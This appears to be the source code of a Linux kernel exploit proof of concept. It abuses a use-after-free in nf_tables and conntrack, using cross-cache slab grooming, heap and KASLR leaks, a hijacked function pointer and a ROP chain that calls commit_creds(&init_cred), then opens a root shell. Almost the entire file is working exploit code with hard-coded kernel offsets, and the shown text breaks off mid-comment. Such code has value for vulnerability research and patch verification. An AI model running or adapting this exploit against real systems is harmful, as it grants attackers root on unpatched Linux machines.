/*
 * Linux kernel exploit PoC: nf_tables / conntrack use-after-free.
 * Cross-cache attack from kmalloc-256 (struct nf_conn) into kmalloc-cg-256
 * (nft_rule / nft_table userdata), leading to a hijacked expr->ops->deactivate,
 * a ROP chain calling commit_creds(&init_cred), and a root shell.
 */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netfilter_ipv4.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>
#include "./helpers.h"
#include "./helpers_nfqueue.h"
#define NFT_NOTRACK_OPS 0x1d430a0
#define INIT_NSPROXY 0x2876900
#define COMMIT_CREDS 0x01d4400
#define FIND_TASK_BY_VPID 0x01cab70
#define SWITCH_TASK_NAMESPACES 0x01d2880
#define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset
#define INIT_CRED 0x2876b40
#define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286 // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf]
#define POP_RSP_R13_R14_R15_RET 0x01f1afb // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret
#define POP_RDI_RET 0x00dd45d // pop rdi ; ret
#define POP_RSI_RET 0x026d67e // pop rsi ; ret
#define POP_RDX_RET 0x0228ce2 // pop rdx ; ret
#define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret
#define UDP_PORT 56789
#define QUEUE_NUM 2
// This enum is used by queue points to determine which packet should be queued.
// This enum is used by queue points to determine which packet should be queued.
// The enumerator value doubles as the first UDP payload byte (sent by
// send_udp_packet() and matched by the cmp expression installed in
// register_conditional_queue_point()).
enum signal_for_queue {
SIGNAL_SPRAY, // queue spray packet
SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet
SIGNAL_TMP_TMPL_NF_CONN // queue temporary template nf_conn packet
};
#define UDP_HEADER_SIZE 8
#define SLAB_CHUNK_SIZE_256 256
#define IPS_CONFIRMED_BIT 3
// CROSS CACHE PARAMS
#define OBJ_PER_SLAB_256 16
#define CPU_PARTIALS_SLABS_256 7
#define MIN_PARTIAL_256 5
#define CROSS_CACHE_DEFRAGMENTATION_SIZE 200
#define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256))
#define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256)
#define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1)
#define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256))
// Netfilter-queue packet ids for the nf_conn-backed packets used to shape the
// kmalloc-256 slab layout. Filled by spray_cross_cache_{pre,post}_alloc()
// (each id comes from alloc_nf_conn()) and drained with NF_DROP verdicts by
// cross_cache_{pre,post}_free().
int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE];
int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE];
int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE];
int spray_cross_cache_post[CROSS_CACHE_POST_SIZE];
int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE];
// SPRAY PARAMS
#define SPRAY_BATCHES 32
#define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks
#define SPRAY_BATCH_SIZE 32
// SIZE AND OFFSETS
#define NFT_RULE_SIZE 0x18
#define NFT_EXPR_SIZE 0x8
#define NFT_LOG_SIZE 0x18
#define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata)
#define NF_CONN_OFFS_CT_GENERAL 0x0
#define NF_CONN_OFFS_CT_STATUS 0x80
#define NF_CONN_OFFS_CT_NET 0x88
#define NF_CONN_OFFS_NAT_BYSOURCE 0x90
#define NF_CONN_OFFS_EXT 0xb0
#define NET_OFFS_CT 0x9c0
#define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10
#define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28
// nf_ct_ext
#define NF_CT_EXT_NUM 9
#define NF_CT_EXT_LABELS 7
// Userspace mirror of the kernel's struct nf_ct_ext header, used to craft a
// fake extension area (see spray_nft_tables_udata_kmalloc_cg_256_fake_ext()).
// offset[] holds per-extension-type byte offsets into data[]; the entry at
// index NF_CT_EXT_LABELS is the one abused to point the labels extension into
// an adjacent nft_rule. Layout must match the target kernel exactly.
struct nf_ct_ext {
uint8_t offset[NF_CT_EXT_NUM];
uint8_t len;
unsigned int gen_id;
char data[];
};
#define BATCH_BUFFER_SIZE 1048576 // 1M buffer should be enough
#define NUMBER_OF_NOTRACK_EXPRS 13 // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset.
#define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule
#define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8 // offset 0xc8 of nft_rule <=> expr->ops->deactivate
sock nlsock; // netlink socket used for all nf_tables traffic
const uint16_t family = NFPROTO_IPV4;
// Userland segment/stack state saved by save_state() and consumed by the
// return-to-usermode frame of the ROP chain.
uint64_t user_cs, user_ss, user_rflags, user_sp;
// Heap address of the first template nf_conn chunk and the KASLR base, both 0 until leaked.
uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0;
char buf[0xffff]; // general purpose buf
// id of the packet in netfilter queue
uint32_t packet_id_first_nf_conn;
uint32_t packet_id_second_nf_conn;
// handle of the nft_rule that re-uses the memory dangling in nf_nat_bysource list (original owned by the first nf_conn)
uint64_t rule_handle_first_nf_conn;
const char base_table[] = "base_table";
const char table_spray_name[] = "table_spray_name";
const char chain_spray_name[] = "chain_spray_name";
// Snapshot the current userland cs/ss/rsp/rflags into globals so the ROP
// chain (built in update_adjacent_nft_rule_udata_with_ROP()) can construct a
// valid KPTI-trampoline return frame back to usermode.
void save_state() {
__asm__(".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;");
}
// Landing point of the ROP chain after privilege escalation: runs in userland
// with init_cred. Re-joins init's mount/pid/net namespaces and spawns an
// interactive shell. Does not return on success.
void after_privesc_as_root() {
    INFO("Returned to userland");
    // Join init's namespaces. Check open() so we never pass -1 to setns()
    // (the original ignored both return values), and don't leak the fds.
    const char *ns_paths[] = {"/proc/1/ns/mnt", "/proc/1/ns/pid", "/proc/1/ns/net"};
    for (size_t i = 0; i < sizeof(ns_paths) / sizeof(ns_paths[0]); i++) {
        int fd = open(ns_paths[i], O_RDONLY);
        if (fd < 0) {
            perror(ns_paths[i]);
            continue;
        }
        if (setns(fd, 0) < 0)
            perror("setns");
        close(fd);
    }
    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);
    // execve only returns on failure.
    perror("execve");
    exit(1);
}
// Write a formatted string to the file `which`, exiting the exploit on any
// failure. Used to populate /proc/self/{uid_map,setgroups,gid_map} during
// user-namespace setup.
void write_to_file(const char *which, const char *format, ...) {
    FILE *fu = fopen(which, "w");
    if (fu == NULL) { // bug fix: fopen() result was passed to vfprintf unchecked
        ERROR("cannot open");
        exit(1);
    }
    va_list args;
    va_start(args, format);
    int rc = vfprintf(fu, format, args);
    va_end(args); // bug fix: va_end was missing
    // fclose() flushes; a failed flush means the write never reached the file,
    // which for the *_map files would silently break the namespace setup.
    if (rc < 0 || fclose(fu) == EOF) {
        ERROR("cannot write");
        exit(1);
    }
}
// Bring the loopback interface up inside the freshly unshared network
// namespace so UDP packets to 127.0.0.1 actually traverse the netfilter hooks.
// Returns 0 on success, 1 on failure.
int loopback_up() {
    struct ifreq ifr;
    int sockfd;
    // Create a socket to perform ioctl operations
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        return 1;
    }
    // Specify the interface name ("lo" for loopback). memset + snprintf fix
    // the original's uninitialized struct and unterminated-strncpy hazard.
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, IFNAMSIZ, "%s", "lo");
    // Get the current flags for the interface
    if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) {
        perror("Failed to get interface flags");
        close(sockfd);
        return 1;
    }
    // Set the IFF_UP flag to bring the interface up
    ifr.ifr_flags |= IFF_UP;
    // Apply the new flags to the interface
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
        perror("Failed to set interface flags");
        close(sockfd);
        return 1;
    }
    INFO("Loopback interface 'lo' is now up.");
    close(sockfd);
    return 0;
}
// Prepare the exploit environment: enter a new user+net namespace (grants
// CAP_NET_ADMIN over the new netns, required for nf_tables), pin to CPU 0 so
// all per-CPU slab/conntrack interactions stay on one CPU, and map uid/gid 0.
// Returns 0 on success, -1 on failure.
int setup(void) {
uid_t uid = getuid();
gid_t gid = getgid();
// In order to use nf_tables, we need CAP_NET_ADMIN
INFO("Setting up user namespace");
if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)");
return -1;
}
INFO("Pinning process to CPU #0");
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
ERROR("sched_setaffinity");
return -1;
}
// now we map uid and gid
write_to_file("/proc/self/uid_map", "0 %d 1", uid);
// deny setgroups (see user_namespaces(7)) -- this must happen BEFORE writing
// gid_map or the gid_map write is rejected by the kernel
write_to_file("/proc/self/setgroups", "deny");
// remap gid
write_to_file("/proc/self/gid_map", "0 %d 1", gid);
loopback_up();
return 0;
}
// Create the base nf_tables table ("base_table") that every exploit chain and
// rule hangs off. Returns the result of committing the netlink batch.
int setup_nft_base_table() {
    batch tx = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    table base = make_table(base_table, family, NULL, 0);
    batch_new_table(tx, base, family);
    return batch_send_and_run_callbacks(tx, nlsock, NULL);
}
// Install the chains that drive the vulnerable code path on NF_INET_LOCAL_OUT:
// - a chain one priority BEFORE conntrack whose rule runs a notrack expression;
// - a chain one priority AFTER conntrack whose rule runs `ct set zone`.
// With conntrack skipped by notrack, evaluating the ct-set-zone expression
// allocates template nf_conns (see the comment in alloc_nf_conn()).
// Returns the result of committing the batch.
int vuln_setup() {
char c_pre_conntrack_name[] = "pre_conntrack_chain";
char c_post_conntrack_name[] = "post_conntrack_chain";
chain c_pre_conntrack = make_chain(base_table, c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL);
expr e_notrack = make_notrack_expr();
rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0);
chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL);
expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00);
rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_chain(b, c_pre_conntrack, family);
batch_new_chain(b, c_post_conntrack, family);
batch_new_rule(b, r_pre_conntrack, family);
batch_new_rule(b, r_post_conntrack, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
// Register a NAT-type base chain so the kernel NAT path (and with it the
// nf_nat_bysource handling this exploit abuses) is active for this netns.
int register_base_nat_chain() {
    // The hooknum can be any valid Netfilter hook
    chain nat_chain = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat");
    batch tx = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_chain(tx, nat_chain, family);
    return batch_send_and_run_callbacks(tx, nlsock, NULL);
}
// Register a chain with a rule that queues packets based on the first byte of their payload
int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) {
chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL);
expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00);
expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare);
expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0);
expr list_e[3] = {e_payload, e_cmp, e_queue};
rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_chain(b, c, family);
batch_new_rule(b, r, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
// Use the NFQA_CT/CTA_LABELS verdict attachment to overwrite the notrack
// expr->ops pointer inside the adjacent nft_rule. The fake nf_ct_ext (sprayed
// earlier) makes the labels extension point into that rule, so the kernel's
// label update writes our value over the ops pointer.
// NOTE(review): the written value is fake_ops ^ orig_ops with an all-zero
// mask — this matches the combine semantics of the kernel's connlabel
// replace; confirm against the target kernel's nf_conntrack_labels.c.
void update_labels_to_overwrites_ops() {
char buf[MNL_SOCKET_BUFFER_SIZE];
struct nlmsghdr *nlh;
struct nlattr *nest;
// Release the packet from the "nf_conn_queue_point_2" queue point.
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM);
nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT);
// The adjacent nft_rule sits one kmalloc-256 chunk after the leaked nf_conn;
// the fake ops table is placed inside its udata so that
// fake_ops->deactivate (at +NFT_EXPR_OPS_OFFS_DEACTIVATE) hits the JOP gadget.
uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256;
uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE;
uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS;
uint8_t cta_labels[16] = {0};
uint8_t cta_masks[16] = {0};
*(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr;
nest = mnl_attr_nest_start(nlh, NFQA_CT);
mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels);
mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks);
mnl_attr_nest_end(nlh, nest);
if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) {
perror("mnl_socket_send");
exit(EXIT_FAILURE);
}
// This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed.
}
// Send a one-byte UDP datagram to 127.0.0.1:UDP_PORT. The byte is an
// enum signal_for_queue value matched by the conditional queue points.
void send_udp_packet(uint8_t first_byte) {
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock < 0) { // bug fix: a failed socket() made sendto(-1, ...) fail silently
        perror("send_udp_packet: socket");
        return;
    }
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr)); // bug fix: sin_zero padding was left uninitialized
    addr.sin_family = AF_INET;
    addr.sin_port = htons(UDP_PORT);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        perror("send_udp_packet: sendto"); // a dropped signal packet desyncs the exploit; at least report it
    close(sock);
}
// Create the dedicated table/chain pair used purely as a container for the
// sprayed nft_rules (hooknum -1: not attached to any netfilter hook).
int setup_chain_to_spray_nft_rule() {
    batch tx = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    table spray_table = make_table(table_spray_name, family, NULL, 0);
    chain spray_chain = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL);
    batch_new_table(tx, spray_table, family);
    batch_new_chain(tx, spray_chain, family);
    return batch_send_and_run_callbacks(tx, nlsock, NULL);
}
// Allocate one temporary template nf_conn in kmalloc-256 and return the
// netfilter-queue packet id that keeps it alive (an NF_DROP verdict on that
// id frees the nf_conn again).
int alloc_nf_conn() {
    // A spray packet makes nft_ct_set_zone_eval() allocate a temporary
    // template nf_conn that stays alive until the packet is dropped.
    send_udp_packet(SIGNAL_SPRAY);
    // recv the packet at the "before_nat_chain" queue point
    return queue_recv(queue_get_id_cb);
}
#define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2
#define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1)
// Netlink dump callback for leak_heap_first_tmpl_nf_conn(): parse one rule,
// skip the NUMBER_OF_NOTRACK_EXPRS padding expressions and read the nft_log
// prefix. For the rule that reclaimed the freed nf_conn, the UAF write left a
// kernel pointer (into the nf_conn's nat_bysource field) in the prefix, from
// which the chunk base address is recovered.
int dump_exprs(const struct nlmsghdr *nlh, void *data) {
rule r = nftnl_rule_alloc();
nftnl_rule_nlmsg_parse(nlh, r);
struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r);
// Skip notrack exprs
for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++)
nftnl_expr_iter_next(iter);
// Retrieve the content of the prefix field
const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX);
if (leaked) {
// The leaked value points at nf_conn.nat_bysource; subtract the field
// offset to get the start of the nf_conn chunk.
leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE;
INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr);
}
nftnl_expr_iter_destroy(iter);
nftnl_rule_free(r);
return MNL_CB_OK;
}
// Dump each sprayed rule in turn until dump_exprs() extracts a heap pointer
// from an overwritten nft_log prefix. On success, records the handle of the
// rule that reclaimed the freed nf_conn chunk in rule_handle_first_nf_conn
// and returns 0; returns -1 if no rule leaked an address.
int leak_heap_first_tmpl_nf_conn() {
char buf[MNL_SOCKET_BUFFER_SIZE];
rule r;
nlmsghdr hdr;
// One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn.
for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) {
r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
// NOTE(review): rseq/seq are helper-library globals; this presumably resets
// the expected netlink sequence number before each dump — confirm in helpers.h
rseq = seq;
hdr = dump_rule(r, buf, family);
nftnl_rule_free(r);
if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) {
ERROR("mnl_socket_sendto");
return -1;
}
if (run_callbacks(nlsock, dump_exprs, NULL) < 0) {
ERROR("run_callbacks leak_heap: primitive");
return -1;
}
if (leaked_first_tmpl_nf_conn_addr) {
rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk.
return 0;
}
}
return -1;
}
// NFQUEUE callback for leak_kaslr(): the queued packet's NFQA_CT attribute now
// reflects the fake nf_conn (whose ext points into the adjacent nft_rule), so
// the reported conntrack labels contain the notrack ops pointer. Subtracting
// the known NFT_NOTRACK_OPS offset yields the KASLR base. Also records the
// packet id for the later verdict in update_labels_to_overwrites_ops().
int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) {
struct nfqnl_msg_packet_hdr *ph = NULL;
char *ct_ext;
struct nlattr *attr[NFQA_MAX + 1] = {};
if (nfq_nlmsg_parse(nlh, attr) < 0) {
perror("problems parsing");
return MNL_CB_ERROR;
}
ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]);
ct_ext = mnl_attr_get_payload(attr[NFQA_CT]);
packet_id_second_nf_conn = ntohl(ph->packet_id);
// 0x4c is the offset of the labels data inside the received payload.
// Use a hard-coded offset to quickly retrieve the value.
vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS;
INFO("Leaked vmlinux: 0x%lx", vmlinux);
return MNL_CB_OK;
}
// Defeat KASLR: release the second nf_conn's packet from queue point 1 so it
// advances to queue point 2, where queue_leak_kaslr_cb() reads the ops
// pointer out of the fake labels extension. Always returns 0; blocks forever
// in queue_recv() if the cross-cache reclaim failed.
int leak_kaslr() {
// The second template nf_conn is now completely under attacker control.
// Release the packet from the "nf_conn_queue_point_1" queue point.
nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT);
INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped");
queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point
return 0;
}
// Spray nft_table userdata allocations (kmalloc-cg-256) to reclaim the freed
// nft_rule chunk. Each udata carries a fake struct nf_ct_ext at the very end
// of the chunk whose labels offset points PAST the chunk boundary, into the
// first expr of the adjacent nft_rule — turning later labels reads/writes
// into reads/writes of that rule's notrack ops pointer.
// Returns 0 on success, -1 on a failed batch commit.
int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() {
int table_spray_counter = 0;
char udata[SLAB_CHUNK_SIZE_256] = {0};
struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET];
fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule
fake_nf_ct_ext->len = 0;
fake_nf_ct_ext->gen_id = 0;
// Use the small batch count: only a handful of freed chunks need reclaiming.
for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
char table_name[32];
sprintf(table_name, "tsrp-1-%d", table_spray_counter++);
table t = make_table(table_name, family, udata, sizeof(udata));
batch_new_table(b, t, family);
nftnl_table_free(t);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
// Queue deletion of the spray-chain rule identified by `handle`. The backing
// memory is released asynchronously after commit (see the nft_commit_release
// sleeps at the call sites).
int del_target_rule(uint32_t handle) {
    batch tx = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    rule victim = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
    batch_del_rule(tx, victim, family);
    return batch_send_and_run_callbacks(tx, nlsock, NULL);
}
// Replace the nft_rule adjacent to the leaked nf_conn chunk with one whose
// userdata embeds the ROP chain, the stack-pivot target, and the JOP gadget
// that expr->ops->deactivate will be redirected to.
// Steps: (1) free every candidate adjacent rule, (2) respray rules whose
// udata is laid out so that chunk offset 0xf holds the pivot, 0x18.. the ROP
// chain, and offset JOP_OFFSET... the JOP gadget address.
// Returns 0 on success, -1 on a failed batch commit.
int update_adjacent_nft_rule_udata_with_ROP() {
// The only way to update the udata of an nft_rule is to free the rule and spray again.
// 1. Free adjacent nft_rule
// Calculate the handle range for the adj nft_rules
int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1);
lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle;
int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1);
upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle;
for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) {
if (handle == rule_handle_first_nf_conn)
continue;
del_target_rule(handle);
}
// @sleep(kernel_func="nft_commit_release",
// desc="wait for adjacent nft_rule to be freed")
usleep(100 * 1000);
// 2. Spray nft_rules with udata containing the ROP chain.
const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata);
char udata[udata_len];
memset(udata, 0, udata_len);
// the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there
// (udata offsets are relative to the expr, NFT_EXPR_SIZE bytes into the chunk,
// hence the -NFT_EXPR_SIZE correction)
*(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET;
uint64_t *rop = (uint64_t *)&udata[0x10];
// commit_creds(&init_cred)
*rop++ = vmlinux + POP_RDI_RET;
*rop++ = vmlinux + INIT_CRED;
*rop++ = vmlinux + COMMIT_CREDS;
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
*rop++ = vmlinux + POP_RDI_RET;
*rop++ = 1;
*rop++ = vmlinux + FIND_TASK_BY_VPID;
*rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET;
*rop++ = 0;
*rop++ = vmlinux + POP_RSI_RET;
*rop++ = vmlinux + INIT_NSPROXY;
*rop++ = vmlinux + SWITCH_TASK_NAMESPACES;
// return to userspace
*rop++ = vmlinux + KPTI_TRAMPOLINE;
// two scratch slots popped by the trampoline before the iretq frame
rop++;
rop++;
*rop++ = (uint64_t)after_privesc_as_root;
*rop++ = user_cs;
*rop++ = user_rflags;
*rop++ = user_sp;
*rop++ = user_ss;
// jop gadget, put here because this space is unused. rsi is pointing to fake_expr
// we can use either of the following, they are equivalent
*rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
// or
#define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE)
*(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
// It’s okay to comment out either one of the two.
expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later.
// Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned.
rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0);
for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
batch_new_rule(b, r, family);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
// Reclaim the freed second template nf_conn (kmalloc-256) with nft_table
// userdata forged to look like a valid confirmed nf_conn: refcount 1,
// IPS_CONFIRMED set, a harmless ct.net pointer, and ext pointing at the fake
// nf_ct_ext placed at the bottom of the leaked chunk. From then on the kernel
// operates on an attacker-controlled conntrack entry.
// Returns 0 on success, -1 on a failed batch commit.
int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() {
int table_spray_counter = 0;
char fake_nf_conn[256] = {0};
*(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1
// set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update()
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT;
// prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()`
// Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr).
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB);
// Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk.
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET;
// Full stress spray: the target chunk sits among many freed kmalloc-256 chunks.
for (int i = 0; i < SPRAY_BATCHES; ++i) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
char table_name[32];
sprintf(table_name, "tsrp-2-%d", table_spray_counter++);
table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn));
batch_new_table(b, t, family);
nftnl_table_free(t);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
// Fire the hijacked function pointer: deleting from the spray chain (handle 0)
// makes the kernel call expr->ops->deactivate on the rule whose ops pointer
// now aims at our JOP gadget, pivoting into the ROP chain.
int escalate() {
    rule trigger = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0);
    batch tx = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_del_rule(tx, trigger, family);
    return batch_send_and_run_callbacks(tx, nlsock, NULL);
}
// First half of the cross-cache grooming: defragment kmalloc-256, then fill
// enough slabs (pre-pre) and one more (pre) so the next allocation — the
